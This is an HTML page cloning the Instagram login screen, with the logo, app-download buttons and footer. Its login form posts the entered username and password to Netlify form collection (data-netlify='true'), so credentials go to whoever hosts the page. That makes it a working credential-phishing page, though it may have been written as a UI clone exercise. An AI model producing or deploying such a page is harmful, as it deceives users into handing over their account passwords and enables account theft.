<!DOCTYPE html>
<html lang="en" lang="uz">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./styles.css" />
    <title>Instagram login</title>
    <link rel="shortcut icon" href="/img/insta.webp" type="image/x-icon" />
</head>
<body>
    <main class="flex align-items-center justify-content-center">
        <section id="mobile" class="flex">
        </section>
        <section id="auth" class="flex direction-column">
            <div class="panel login flex direction-column">
                <h1 title="Instagram" class="flex justify-content-center">
                    <img src="./img//instagram-logo.png" alt="Instagram logo" title="Instagram logo" />
                </h1>
                <form method="POST" data-netlify="true">
                   
                    <input name="text" placeholder="Phone number, username or email" type="text" reqiured />

                   
                    <input name="password" type="password" placeholder="Password" reqiured/>

                    <button type="submit">Log In</button>
                </form>
                <div class="flex separator align-items-center">
                    <span></span>
                    <div class="or">OR</div>
                    <span></span>
                </div>
                <div class="login-with-fb flex direction-column align-items-center">
                    <div>
                        <img />
                        <a>Login in with Facebook</a>
                    </div>
                    <a href="#">Forgot password?</a>
                </div>
            </div>
            <div class="panel register flex justify-content-center">
                <p>Don't have an accaunt?</p>
                <a href="#">Sing up</a>
            </div>
            <div class="app-download flex direction-column align-items-center">
                <p>Get the app.</p> <br>
                <div class="flex justify-content-center">
                    <img src="./img/apple-button.png"      alt="Imagem com a logo da Apple Store" title="Imagem com a logo da Apple Store" />
                    <img src="./img/googleplay-button.png" alt="Imagem com a logo da Google Play" title="Imagem com a logo da Google Play" />
                </div>
            </div>
        </section>
    </main>
    <footer>
        <ul class="flex flex-wrap justify-content-center">
            <li><a href="#">ABOUT</a></li>
            <li><a href="#">LOCATIONS</a></li>
            <li><a href="#">HELP</a></li>
            <li><a href="#">TOP</a></li>
            <li><a href="#">ACCAUNTS</a></li>
            <li><a href="#">PRESS</a></li>
            <li><a href="#">API</a></li>
            <li><a href="#">JOBS</a></li>
            <li><a href="#">HASHTAGS</a></li>
            <li><a href="#">PRIVACY</a></li>
            <li><a href="#">LANGUAGE</a></li>
            <li><a href="#">TERMS</a></li>
        </ul>
        <p class="copyright">© 2020 INSTAGRAM FROM FACEBOOK</p>
    </footer>
</body>
</html>
